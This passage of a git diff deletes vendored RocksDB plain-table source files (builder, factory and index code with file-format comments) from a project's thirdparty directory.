-  ParsedInternalKey internal_key;
-  if (!ParseInternalKey(key, &internal_key)) {
-    assert(false);
-    return;
-  }
-  if (internal_key.type == kTypeRangeDeletion) {
-    status_ = Status::NotSupported("Range deletion unsupported");
-    return;
-  }
-
-  // Store key hash
-  if (store_index_in_file_) {
-    if (ioptions_.prefix_extractor == nullptr) {
-      keys_or_prefixes_hashes_.push_back(GetSliceHash(internal_key.user_key));
-    } else {
-      Slice prefix =
-          ioptions_.prefix_extractor->Transform(internal_key.user_key);
-      keys_or_prefixes_hashes_.push_back(GetSliceHash(prefix));
-    }
-  }
-
-  // Write value
-  assert(offset_ <= std::numeric_limits<uint32_t>::max());
-  auto prev_offset = static_cast<uint32_t>(offset_);
-  // Write out the key
-  encoder_.AppendKey(key, file_, &offset_, meta_bytes_buf,
-                     &meta_bytes_buf_size);
-  if (SaveIndexInFile()) {
-    index_builder_->AddKeyPrefix(GetPrefix(internal_key), prev_offset);
-  }
-
-  // Write value length
-  uint32_t value_size = static_cast<uint32_t>(value.size());
-  char* end_ptr =
-      EncodeVarint32(meta_bytes_buf + meta_bytes_buf_size, value_size);
-  assert(end_ptr <= meta_bytes_buf + sizeof(meta_bytes_buf));
-  meta_bytes_buf_size = end_ptr - meta_bytes_buf;
-  file_->Append(Slice(meta_bytes_buf, meta_bytes_buf_size));
-
-  // Write value
-  file_->Append(value);
-  offset_ += value_size + meta_bytes_buf_size;
-
-  properties_.num_entries++;
-  properties_.raw_key_size += key.size();
-  properties_.raw_value_size += value.size();
-
-  // notify property collectors
-  NotifyCollectTableCollectorsOnAdd(
-      key, value, offset_, table_properties_collectors_, ioptions_.info_log);
-}
-
-Status PlainTableBuilder::status() const { return status_; }
-
-Status PlainTableBuilder::Finish() {
-  assert(!closed_);
-  closed_ = true;
-
-  properties_.data_size = offset_;
-
-  //  Write the following blocks
-  //  1. [meta block: bloom] - optional
-  //  2. [meta block: index] - optional
-  //  3. [meta block: properties]
-  //  4. [metaindex block]
-  //  5. [footer]
-
-  MetaIndexBuilder meta_index_builer;
-
-  if (store_index_in_file_ && (properties_.num_entries > 0)) {
-    assert(properties_.num_entries <= std::numeric_limits<uint32_t>::max());
-    Status s;
-    BlockHandle bloom_block_handle;
-    if (bloom_bits_per_key_ > 0) {
-      bloom_block_.SetTotalBits(
-          &arena_,
-          static_cast<uint32_t>(properties_.num_entries) * bloom_bits_per_key_,
-          ioptions_.bloom_locality, huge_page_tlb_size_, ioptions_.info_log);
-
-      PutVarint32(&properties_.user_collected_properties
-                       [PlainTablePropertyNames::kNumBloomBlocks],
-                  bloom_block_.GetNumBlocks());
-
-      bloom_block_.AddKeysHashes(keys_or_prefixes_hashes_);
-
-      Slice bloom_finish_result = bloom_block_.Finish();
-
-      properties_.filter_size = bloom_finish_result.size();
-      s = WriteBlock(bloom_finish_result, file_, &offset_, &bloom_block_handle);
-
-      if (!s.ok()) {
-        return s;
-      }
-      meta_index_builer.Add(BloomBlockBuilder::kBloomBlock, bloom_block_handle);
-    }
-    BlockHandle index_block_handle;
-    Slice index_finish_result = index_builder_->Finish();
-
-    properties_.index_size = index_finish_result.size();
-    s = WriteBlock(index_finish_result, file_, &offset_, &index_block_handle);
-
-    if (!s.ok()) {
-      return s;
-    }
-
-    meta_index_builer.Add(PlainTableIndexBuilder::kPlainTableIndexBlock,
-                          index_block_handle);
-  }
-
-  // Calculate bloom block size and index block size
-  PropertyBlockBuilder property_block_builder;
-  // -- Add basic properties
-  property_block_builder.AddTableProperty(properties_);
-
-  property_block_builder.Add(properties_.user_collected_properties);
-
-  // -- Add user collected properties
-  NotifyCollectTableCollectorsOnFinish(table_properties_collectors_,
-                                       ioptions_.info_log,
-                                       &property_block_builder);
-
-  // -- Write property block
-  BlockHandle property_block_handle;
-  auto s = WriteBlock(
-      property_block_builder.Finish(),
-      file_,
-      &offset_,
-      &property_block_handle
-  );
-  if (!s.ok()) {
-    return s;
-  }
-  meta_index_builer.Add(kPropertiesBlock, property_block_handle);
-
-  // -- write metaindex block
-  BlockHandle metaindex_block_handle;
-  s = WriteBlock(
-      meta_index_builer.Finish(),
-      file_,
-      &offset_,
-      &metaindex_block_handle
-  );
-  if (!s.ok()) {
-    return s;
-  }
-
-  // Write Footer
-  // no need to write out new footer if we're using default checksum
-  Footer footer(kLegacyPlainTableMagicNumber, 0);
-  footer.set_metaindex_handle(metaindex_block_handle);
-  footer.set_index_handle(BlockHandle::NullBlockHandle());
-  std::string footer_encoding;
-  footer.EncodeTo(&footer_encoding);
-  s = file_->Append(footer_encoding);
-  if (s.ok()) {
-    offset_ += footer_encoding.size();
-  }
-
-  return s;
-}
-
-void PlainTableBuilder::Abandon() {
-  closed_ = true;
-}
-
-uint64_t PlainTableBuilder::NumEntries() const {
-  return properties_.num_entries;
-}
-
-uint64_t PlainTableBuilder::FileSize() const {
-  return offset_;
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_builder.h b/thirdparty/rocksdb/table/plain_table_builder.h
deleted file mode 100644
index 1d1f6c7..0000000
--- a/thirdparty/rocksdb/table/plain_table_builder.h
+++ /dev/null
@@ -1,137 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include <stdint.h>
-#include <string>
-#include <vector>
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "table/bloom_block.h"
-#include "table/plain_table_index.h"
-#include "table/plain_table_key_coding.h"
-#include "table/table_builder.h"
-
-namespace rocksdb {
-
-class BlockBuilder;
-class BlockHandle;
-class WritableFile;
-class TableBuilder;
-
-class PlainTableBuilder: public TableBuilder {
- public:
-  // Create a builder that will store the contents of the table it is
-  // building in *file.  Does not close the file.  It is up to the
-  // caller to close the file after calling Finish(). The output file
-  // will be part of level specified by 'level'.  A value of -1 means
-  // that the caller does not know which level the output file will reside.
-  PlainTableBuilder(
-      const ImmutableCFOptions& ioptions,
-      const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-          int_tbl_prop_collector_factories,
-      uint32_t column_family_id, WritableFileWriter* file,
-      uint32_t user_key_size, EncodingType encoding_type,
-      size_t index_sparseness, uint32_t bloom_bits_per_key,
-      const std::string& column_family_name, uint32_t num_probes = 6,
-      size_t huge_page_tlb_size = 0, double hash_table_ratio = 0,
-      bool store_index_in_file = false);
-
-  // REQUIRES: Either Finish() or Abandon() has been called.
-  ~PlainTableBuilder();
-
-  // Add key,value to the table being constructed.
-  // REQUIRES: key is after any previously added key according to comparator.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Add(const Slice& key, const Slice& value) override;
-
-  // Return non-ok iff some error has been detected.
-  Status status() const override;
-
-  // Finish building the table.  Stops using the file passed to the
-  // constructor after this function returns.
-  // REQUIRES: Finish(), Abandon() have not been called
-  Status Finish() override;
-
-  // Indicate that the contents of this builder should be abandoned.  Stops
-  // using the file passed to the constructor after this function returns.
-  // If the caller is not going to call Finish(), it must call Abandon()
-  // before destroying this builder.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Abandon() override;
-
-  // Number of calls to Add() so far.
-  uint64_t NumEntries() const override;
-
-  // Size of the file generated so far.  If invoked after a successful
-  // Finish() call, returns the size of the final generated file.
-  uint64_t FileSize() const override;
-
-  TableProperties GetTableProperties() const override { return properties_; }
-
-  bool SaveIndexInFile() const { return store_index_in_file_; }
-
- private:
-  Arena arena_;
-  const ImmutableCFOptions& ioptions_;
-  std::vector<std::unique_ptr<IntTblPropCollector>>
-      table_properties_collectors_;
-
-  BloomBlockBuilder bloom_block_;
-  std::unique_ptr<PlainTableIndexBuilder> index_builder_;
-
-  WritableFileWriter* file_;
-  uint64_t offset_ = 0;
-  uint32_t bloom_bits_per_key_;
-  size_t huge_page_tlb_size_;
-  Status status_;
-  TableProperties properties_;
-  PlainTableKeyEncoder encoder_;
-
-  bool store_index_in_file_;
-
-  std::vector<uint32_t> keys_or_prefixes_hashes_;
-  bool closed_ = false;  // Either Finish() or Abandon() has been called.
-
-  const SliceTransform* prefix_extractor_;
-
-  Slice GetPrefix(const Slice& target) const {
-    assert(target.size() >= 8);  // target is internal key
-    return GetPrefixFromUserKey(GetUserKey(target));
-  }
-
-  Slice GetPrefix(const ParsedInternalKey& target) const {
-    return GetPrefixFromUserKey(target.user_key);
-  }
-
-  Slice GetUserKey(const Slice& key) const {
-    return Slice(key.data(), key.size() - 8);
-  }
-
-  Slice GetPrefixFromUserKey(const Slice& user_key) const {
-    if (!IsTotalOrderMode()) {
-      return prefix_extractor_->Transform(user_key);
-    } else {
-      // Use empty slice as prefix if prefix_extractor is not set.
-      // In that case,
-      // it falls back to pure binary search and
-      // total iterator seek is supported.
-      return Slice();
-    }
-  }
-
-  bool IsTotalOrderMode() const { return (prefix_extractor_ == nullptr); }
-
-  // No copying allowed
-  PlainTableBuilder(const PlainTableBuilder&) = delete;
-  void operator=(const PlainTableBuilder&) = delete;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_factory.cc b/thirdparty/rocksdb/table/plain_table_factory.cc
deleted file mode 100644
index 5f7809b..0000000
--- a/thirdparty/rocksdb/table/plain_table_factory.cc
+++ /dev/null
@@ -1,238 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-#include "table/plain_table_factory.h"
-
-#include <stdint.h>
-#include <memory>
-#include "db/dbformat.h"
-#include "options/options_helper.h"
-#include "port/port.h"
-#include "rocksdb/convenience.h"
-#include "table/plain_table_builder.h"
-#include "table/plain_table_reader.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-Status PlainTableFactory::NewTableReader(
-    const TableReaderOptions& table_reader_options,
-    unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-    unique_ptr<TableReader>* table,
-    bool prefetch_index_and_filter_in_cache) const {
-  return PlainTableReader::Open(
-      table_reader_options.ioptions, table_reader_options.env_options,
-      table_reader_options.internal_comparator, std::move(file), file_size,
-      table, table_options_.bloom_bits_per_key, table_options_.hash_table_ratio,
-      table_options_.index_sparseness, table_options_.huge_page_tlb_size,
-      table_options_.full_scan_mode);
-}
-
-TableBuilder* PlainTableFactory::NewTableBuilder(
-    const TableBuilderOptions& table_builder_options, uint32_t column_family_id,
-    WritableFileWriter* file) const {
-  // Ignore the skip_filters flag. PlainTable format is optimized for small
-  // in-memory dbs. The skip_filters optimization is not useful for plain
-  // tables
-  //
-  return new PlainTableBuilder(
-      table_builder_options.ioptions,
-      table_builder_options.int_tbl_prop_collector_factories, column_family_id,
-      file, table_options_.user_key_len, table_options_.encoding_type,
-      table_options_.index_sparseness, table_options_.bloom_bits_per_key,
-      table_builder_options.column_family_name, 6,
-      table_options_.huge_page_tlb_size, table_options_.hash_table_ratio,
-      table_options_.store_index_in_file);
-}
-
-std::string PlainTableFactory::GetPrintableTableOptions() const {
-  std::string ret;
-  ret.reserve(20000);
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-
-  snprintf(buffer, kBufferSize, "  user_key_len: %u\n",
-           table_options_.user_key_len);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  bloom_bits_per_key: %d\n",
-           table_options_.bloom_bits_per_key);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  hash_table_ratio: %lf\n",
-           table_options_.hash_table_ratio);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  index_sparseness: %" ROCKSDB_PRIszt "\n",
-           table_options_.index_sparseness);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  huge_page_tlb_size: %" ROCKSDB_PRIszt "\n",
-           table_options_.huge_page_tlb_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  encoding_type: %d\n",
-           table_options_.encoding_type);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  full_scan_mode: %d\n",
-           table_options_.full_scan_mode);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  store_index_in_file: %d\n",
-           table_options_.store_index_in_file);
-  ret.append(buffer);
-  return ret;
-}
-
-const PlainTableOptions& PlainTableFactory::table_options() const {
-  return table_options_;
-}
-
-Status GetPlainTableOptionsFromString(const PlainTableOptions& table_options,
-                                      const std::string& opts_str,
-                                      PlainTableOptions* new_table_options) {
-  std::unordered_map<std::string, std::string> opts_map;
-  Status s = StringToMap(opts_str, &opts_map);
-  if (!s.ok()) {
-    return s;
-  }
-  return GetPlainTableOptionsFromMap(table_options, opts_map,
-                                     new_table_options);
-}
-
-Status GetMemTableRepFactoryFromString(
-    const std::string& opts_str,
-    std::unique_ptr<MemTableRepFactory>* new_mem_factory) {
-  std::vector<std::string> opts_list = StringSplit(opts_str, ':');
-  size_t len = opts_list.size();
-
-  if (opts_list.size() <= 0 || opts_list.size() > 2) {
-    return Status::InvalidArgument("Can't parse memtable_factory option ",
-                                   opts_str);
-  }
-
-  MemTableRepFactory* mem_factory = nullptr;
-
-  if (opts_list[0] == "skip_list") {
-    // Expecting format
-    // skip_list:<lookahead>
-    if (2 == len) {
-      size_t lookahead = ParseSizeT(opts_list[1]);
-      mem_factory = new SkipListFactory(lookahead);
-    } else if (1 == len) {
-      mem_factory = new SkipListFactory();
-    }
-  } else if (opts_list[0] == "prefix_hash") {
-    // Expecting format
-    // prfix_hash:<hash_bucket_count>
-    if (2 == len) {
-      size_t hash_bucket_count = ParseSizeT(opts_list[1]);
-      mem_factory = NewHashSkipListRepFactory(hash_bucket_count);
-    } else if (1 == len) {
-      mem_factory = NewHashSkipListRepFactory();
-    }
-  } else if (opts_list[0] == "hash_linkedlist") {
-    // Expecting format
-    // hash_linkedlist:<hash_bucket_count>
-    if (2 == len) {
-      size_t hash_bucket_count = ParseSizeT(opts_list[1]);
-      mem_factory = NewHashLinkListRepFactory(hash_bucket_count);
-    } else if (1 == len) {
-      mem_factory = NewHashLinkListRepFactory();
-    }
-  } else if (opts_list[0] == "vector") {
-    // Expecting format
-    // vector:<count>
-    if (2 == len) {
-      size_t count = ParseSizeT(opts_list[1]);
-      mem_factory = new VectorRepFactory(count);
-    } else if (1 == len) {
-      mem_factory = new VectorRepFactory();
-    }
-  } else if (opts_list[0] == "cuckoo") {
-    // Expecting format
-    // cuckoo:<write_buffer_size>
-    if (2 == len) {
-      size_t write_buffer_size = ParseSizeT(opts_list[1]);
-      mem_factory = NewHashCuckooRepFactory(write_buffer_size);
-    } else if (1 == len) {
-      return Status::InvalidArgument("Can't parse memtable_factory option ",
-                                     opts_str);
-    }
-  } else {
-    return Status::InvalidArgument("Unrecognized memtable_factory option ",
-                                   opts_str);
-  }
-
-  if (mem_factory != nullptr) {
-    new_mem_factory->reset(mem_factory);
-  }
-
-  return Status::OK();
-}
-
-std::string ParsePlainTableOptions(const std::string& name,
-                                   const std::string& org_value,
-                                   PlainTableOptions* new_options,
-                                   bool input_strings_escaped = false,
-                                   bool ignore_unknown_options = false) {
-  const std::string& value =
-      input_strings_escaped ? UnescapeOptionString(org_value) : org_value;
-  const auto iter = plain_table_type_info.find(name);
-  if (iter == plain_table_type_info.end()) {
-    if (ignore_unknown_options) {
-      return "";
-    } else {
-      return "Unrecognized option";
-    }
-  }
-  const auto& opt_info = iter->second;
-  if (opt_info.verification != OptionVerificationType::kDeprecated &&
-      !ParseOptionHelper(reinterpret_cast<char*>(new_options) + opt_info.offset,
-                         opt_info.type, value)) {
-    return "Invalid value";
-  }
-  return "";
-}
-
-Status GetPlainTableOptionsFromMap(
-    const PlainTableOptions& table_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    PlainTableOptions* new_table_options, bool input_strings_escaped,
-    bool ignore_unknown_options) {
-  assert(new_table_options);
-  *new_table_options = table_options;
-  for (const auto& o : opts_map) {
-    auto error_message = ParsePlainTableOptions(
-        o.first, o.second, new_table_options, input_strings_escaped);
-    if (error_message != "") {
-      const auto iter = plain_table_type_info.find(o.first);
-      if (iter == plain_table_type_info.end() ||
-          !input_strings_escaped ||  // !input_strings_escaped indicates
-                                     // the old API, where everything is
-                                     // parsable.
-          (iter->second.verification != OptionVerificationType::kByName &&
-           iter->second.verification !=
-               OptionVerificationType::kByNameAllowNull &&
-           iter->second.verification != OptionVerificationType::kDeprecated)) {
-        // Restore "new_options" to the default "base_options".
-        *new_table_options = table_options;
-        return Status::InvalidArgument("Can't parse PlainTableOptions:",
-                                       o.first + " " + error_message);
-      }
-    }
-  }
-  return Status::OK();
-}
-
-extern TableFactory* NewPlainTableFactory(const PlainTableOptions& options) {
-  return new PlainTableFactory(options);
-}
-
-const std::string PlainTablePropertyNames::kEncodingType =
-    "rocksdb.plain.table.encoding.type";
-
-const std::string PlainTablePropertyNames::kBloomVersion =
-    "rocksdb.plain.table.bloom.version";
-
-const std::string PlainTablePropertyNames::kNumBloomBlocks =
-    "rocksdb.plain.table.bloom.numblocks";
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_factory.h b/thirdparty/rocksdb/table/plain_table_factory.h
deleted file mode 100644
index 6c9ca44..0000000
--- a/thirdparty/rocksdb/table/plain_table_factory.h
+++ /dev/null
@@ -1,210 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-#include <memory>
-#include <string>
-#include <stdint.h>
-
-#include "options/options_helper.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-
-namespace rocksdb {
-
-struct EnvOptions;
-
-using std::unique_ptr;
-class Status;
-class RandomAccessFile;
-class WritableFile;
-class Table;
-class TableBuilder;
-
-// IndexedTable requires fixed length key, configured as a constructor
-// parameter of the factory class. Output file format:
-// +-------------+-----------------+
-// | version     | user_key_length |
-// +------------++------------+-----------------+  <= key1 offset
-// |  encoded key1            | value_size  |   |
-// +------------+-------------+-------------+   |
-// | value1                                     |
-// |                                            |
-// +--------------------------+-------------+---+  <= key2 offset
-// | encoded key2             | value_size  |   |
-// +------------+-------------+-------------+   |
-// | value2                                     |
-// |                                            |
-// |        ......                              |
-// +-----------------+--------------------------+
-//
-// When the key encoding type is kPlain. Key part is encoded as:
-// +------------+--------------------+
-// | [key_size] |  internal key      |
-// +------------+--------------------+
-// for the case of user_key_len = kPlainTableVariableLength case,
-// and simply:
-// +----------------------+
-// |  internal key        |
-// +----------------------+
-// for user_key_len != kPlainTableVariableLength case.
-//
-// If key encoding type is kPrefix. Keys are encoding in this format.
-// There are three ways to encode a key:
-// (1) Full Key
-// +---------------+---------------+-------------------+
-// | Full Key Flag | Full Key Size | Full Internal Key |
-// +---------------+---------------+-------------------+
-// which simply encodes a full key
-//
-// (2) A key shared the same prefix as the previous key, which is encoded as
-//     format of (1).
-// +-------------+-------------+-------------+-------------+------------+
-// | Prefix Flag | Prefix Size | Suffix Flag | Suffix Size | Key Suffix |
-// +-------------+-------------+-------------+-------------+------------+
-// where key is the suffix part of the key, including the internal bytes.
-// the actual key will be constructed by concatenating prefix part of the
-// previous key, with the suffix part of the key here, with sizes given here.
-//
-// (3) A key shared the same prefix as the previous key, which is encoded as
-//     the format of (2).
-// +-----------------+-----------------+------------------------+
-// | Key Suffix Flag | Key Suffix Size | Suffix of Internal Key |
-// +-----------------+-----------------+------------------------+
-// The key will be constructed by concatenating previous key's prefix (which is
-// also a prefix which the last key encoded in the format of (1)) and the
-// key given here.
-//
-// For example, we for following keys (prefix and suffix are separated by
-// spaces):
-//   0000 0001
-//   0000 00021
-//   0000 0002
-//   00011 00
-//   0002 0001
-// Will be encoded like this:
-//   FK 8 00000001
-//   PF 4 SF 5 00021
-//   SF 4 0002
-//   FK 7 0001100
-//   FK 8 00020001
-// (where FK means full key flag, PF means prefix flag and SF means suffix flag)
-//
-// All those "key flag + key size" shown above are in this format:
-// The 8 bits of the first byte:
-// +----+----+----+----+----+----+----+----+
-// |  Type   |            Size             |
-// +----+----+----+----+----+----+----+----+
-// Type indicates: full key, prefix, or suffix.
-// The last 6 bits are for size. If the size bits are not all 1, it means the
-// size of the key. Otherwise, varint32 is read after this byte. This varint
-// value + 0x3F (the value of all 1) will be the key size.
-//
-// For example, full key with length 16 will be encoded as (binary):
-//     00 010000
-// (00 means full key)
-// and a prefix with 100 bytes will be encoded as:
-//     01 111111    00100101
-//         (63)       (37)
-// (01 means key suffix)
-//
-// All the internal keys above (including kPlain and kPrefix) are encoded in
-// this format:
-// There are two types:
-// (1) normal internal key format
-// +----------- ...... -------------+----+---+---+---+---+---+---+---+
-// |       user key                 |type|      sequence ID          |
-// +----------- ..... --------------+----+---+---+---+---+---+---+---+
-// (2) Special case for keys whose sequence ID is 0 and is value type
-// +----------- ...... -------------+----+
-// |       user key                 |0x80|
-// +----------- ..... --------------+----+
-// To save 7 bytes for the special case where sequence ID = 0.
-//
-//
-class PlainTableFactory : public TableFactory {
- public:
-  ~PlainTableFactory() {}
-  // user_key_len is the length of the user key. If it is set to be
-  // kPlainTableVariableLength, then it means variable length. Otherwise, all
-  // the keys need to have the fix length of this value. bloom_bits_per_key is
-  // number of bits used for bloom filer per key. hash_table_ratio is
-  // the desired utilization of the hash table used for prefix hashing.
-  // hash_table_ratio = number of prefixes / #buckets in the hash table
-  // hash_table_ratio = 0 means skip hash table but only replying on binary
-  // search.
-  // index_sparseness determines index interval for keys
-  // inside the same prefix. It will be the maximum number of linear search
-  // required after hash and binary search.
-  // index_sparseness = 0 means index for every key.
-  // huge_page_tlb_size determines whether to allocate hash indexes from huge
-  // page TLB and the page size if allocating from there. See comments of
-  // Arena::AllocateAligned() for details.
-  explicit PlainTableFactory(
-      const PlainTableOptions& _table_options = PlainTableOptions())
-      : table_options_(_table_options) {}
-
-  const char* Name() const override { return "PlainTable"; }
-  Status NewTableReader(const TableReaderOptions& table_reader_options,
-                        unique_ptr<RandomAccessFileReader>&& file,
-                        uint64_t file_size, unique_ptr<TableReader>* table,
-                        bool prefetch_index_and_filter_in_cache) const override;
-
-  TableBuilder* NewTableBuilder(
-      const TableBuilderOptions& table_builder_options,
-      uint32_t column_family_id, WritableFileWriter* file) const override;
-
-  std::string GetPrintableTableOptions() const override;
-
-  const PlainTableOptions& table_options() const;
-
-  static const char kValueTypeSeqId0 = char(0xFF);
-
-  // Sanitizes the specified DB Options.
-  Status SanitizeOptions(const DBOptions& db_opts,
-                         const ColumnFamilyOptions& cf_opts) const override {
-    return Status::OK();
-  }
-
-  void* GetOptions() override { return &table_options_; }
-
-  Status GetOptionString(std::string* opt_string,
-                         const std::string& delimiter) const override {
-    return Status::OK();
-  }
-
- private:
-  PlainTableOptions table_options_;
-};
-
-static std::unordered_map<std::string, OptionTypeInfo> plain_table_type_info = {
-    {"user_key_len",
-     {offsetof(struct PlainTableOptions, user_key_len), OptionType::kUInt32T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"bloom_bits_per_key",
-     {offsetof(struct PlainTableOptions, bloom_bits_per_key), OptionType::kInt,
-      OptionVerificationType::kNormal, false, 0}},
-    {"hash_table_ratio",
-     {offsetof(struct PlainTableOptions, hash_table_ratio), OptionType::kDouble,
-      OptionVerificationType::kNormal, false, 0}},
-    {"index_sparseness",
-     {offsetof(struct PlainTableOptions, index_sparseness), OptionType::kSizeT,
-      OptionVerificationType::kNormal, false, 0}},
-    {"huge_page_tlb_size",
-     {offsetof(struct PlainTableOptions, huge_page_tlb_size),
-      OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}},
-    {"encoding_type",
-     {offsetof(struct PlainTableOptions, encoding_type),
-      OptionType::kEncodingType, OptionVerificationType::kByName, false, 0}},
-    {"full_scan_mode",
-     {offsetof(struct PlainTableOptions, full_scan_mode), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"store_index_in_file",
-     {offsetof(struct PlainTableOptions, store_index_in_file),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_index.cc b/thirdparty/rocksdb/table/plain_table_index.cc
deleted file mode 100644
index 39a6b53..0000000
--- a/thirdparty/rocksdb/table/plain_table_index.cc
+++ /dev/null
@@ -1,215 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-
-#include "table/plain_table_index.h"
-#include "util/coding.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-namespace {
-inline uint32_t GetBucketIdFromHash(uint32_t hash, uint32_t num_buckets) {
-  assert(num_buckets > 0);
-  return hash % num_buckets;
-}
-}
-
-Status PlainTableIndex::InitFromRawData(Slice data) {
-  if (!GetVarint32(&data, &index_size_)) {
-    return Status::Corruption("Couldn't read the index size!");
-  }
-  assert(index_size_ > 0);
-  if (!GetVarint32(&data, &num_prefixes_)) {
-    return Status::Corruption("Couldn't read the index size!");
-  }
-  sub_index_size_ =
-      static_cast<uint32_t>(data.size()) - index_size_ * kOffsetLen;
-
-  char* index_data_begin = const_cast<char*>(data.data());
-  index_ = reinterpret_cast<uint32_t*>(index_data_begin);
-  sub_index_ = reinterpret_cast<char*>(index_ + index_size_);
-  return Status::OK();
-}
-
-PlainTableIndex::IndexSearchResult PlainTableIndex::GetOffset(
-    uint32_t prefix_hash, uint32_t* bucket_value) const {
-  int bucket = GetBucketIdFromHash(prefix_hash, index_size_);
-  GetUnaligned(index_ + bucket, bucket_value);
-  if ((*bucket_value & kSubIndexMask) == kSubIndexMask) {
-    *bucket_value ^= kSubIndexMask;
-    return kSubindex;
-  }
-  if (*bucket_value >= kMaxFileSize) {
-    return kNoPrefixForBucket;
-  } else {
-    // point directly to the file
-    return kDirectToFile;
-  }
-}
-
-void PlainTableIndexBuilder::IndexRecordList::AddRecord(uint32_t hash,
-                                                        uint32_t offset) {
-  if (num_records_in_current_group_ == kNumRecordsPerGroup) {
-    current_group_ = AllocateNewGroup();
-    num_records_in_current_group_ = 0;
-  }
-  auto& new_record = current_group_[num_records_in_current_group_++];
-  new_record.hash = hash;
-  new_record.offset = offset;
-  new_record.next = nullptr;
-}
-
-void PlainTableIndexBuilder::AddKeyPrefix(Slice key_prefix_slice,
-                                          uint32_t key_offset) {
-  if (is_first_record_ || prev_key_prefix_ != key_prefix_slice.ToString()) {
-    ++num_prefixes_;
-    if (!is_first_record_) {
-      keys_per_prefix_hist_.Add(num_keys_per_prefix_);
-    }
-    num_keys_per_prefix_ = 0;
-    prev_key_prefix_ = key_prefix_slice.ToString();
-    prev_key_prefix_hash_ = GetSliceHash(key_prefix_slice);
-    due_index_ = true;
-  }
-
-  if (due_index_) {
-    // Add an index key for every kIndexIntervalForSamePrefixKeys keys
-    record_list_.AddRecord(prev_key_prefix_hash_, key_offset);
-    due_index_ = false;
-  }
-
-  num_keys_per_prefix_++;
-  if (index_sparseness_ == 0 || num_keys_per_prefix_ % index_sparseness_ == 0) {
-    due_index_ = true;
-  }
-  is_first_record_ = false;
-}
-
-Slice PlainTableIndexBuilder::Finish() {
-  AllocateIndex();
-  std::vector<IndexRecord*> hash_to_offsets(index_size_, nullptr);
-  std::vector<uint32_t> entries_per_bucket(index_size_, 0);
-  BucketizeIndexes(&hash_to_offsets, &entries_per_bucket);
-
-  keys_per_prefix_hist_.Add(num_keys_per_prefix_);
-  ROCKS_LOG_INFO(ioptions_.info_log, "Number of Keys per prefix Histogram: %s",
-                 keys_per_prefix_hist_.ToString().c_str());
-
-  // From the temp data structure, populate indexes.
-  return FillIndexes(hash_to_offsets, entries_per_bucket);
-}
-
-void PlainTableIndexBuilder::AllocateIndex() {
-  if (prefix_extractor_ == nullptr || hash_table_ratio_ <= 0) {
-    // Fall back to pure binary search if the user fails to specify a prefix
-    // extractor.
-    index_size_ = 1;
-  } else {
-    double hash_table_size_multipier = 1.0 / hash_table_ratio_;
-    index_size_ =
-      static_cast<uint32_t>(num_prefixes_ * hash_table_size_multipier) + 1;
-    assert(index_size_ > 0);
-  }
-}
-
-void PlainTableIndexBuilder::BucketizeIndexes(
-    std::vector<IndexRecord*>* hash_to_offsets,
-    std::vector<uint32_t>* entries_per_bucket) {
-  bool first = true;
-  uint32_t prev_hash = 0;
-  size_t num_records = record_list_.GetNumRecords();
-  for (size_t i = 0; i < num_records; i++) {
-    IndexRecord* index_record = record_list_.At(i);
-    uint32_t cur_hash = index_record->hash;
-    if (first || prev_hash != cur_hash) {
-      prev_hash = cur_hash;
-      first = false;
-    }
-    uint32_t bucket = GetBucketIdFromHash(cur_hash, index_size_);
-    IndexRecord* prev_bucket_head = (*hash_to_offsets)[bucket];
-    index_record->next = prev_bucket_head;
-    (*hash_to_offsets)[bucket] = index_record;
-    (*entries_per_bucket)[bucket]++;
-  }
-
-  sub_index_size_ = 0;
-  for (auto entry_count : *entries_per_bucket) {
-    if (entry_count <= 1) {
-      continue;
-    }
-    // Only buckets with more than 1 entry will have subindex.
-    sub_index_size_ += VarintLength(entry_count);
-    // total bytes needed to store these entries' in-file offsets.
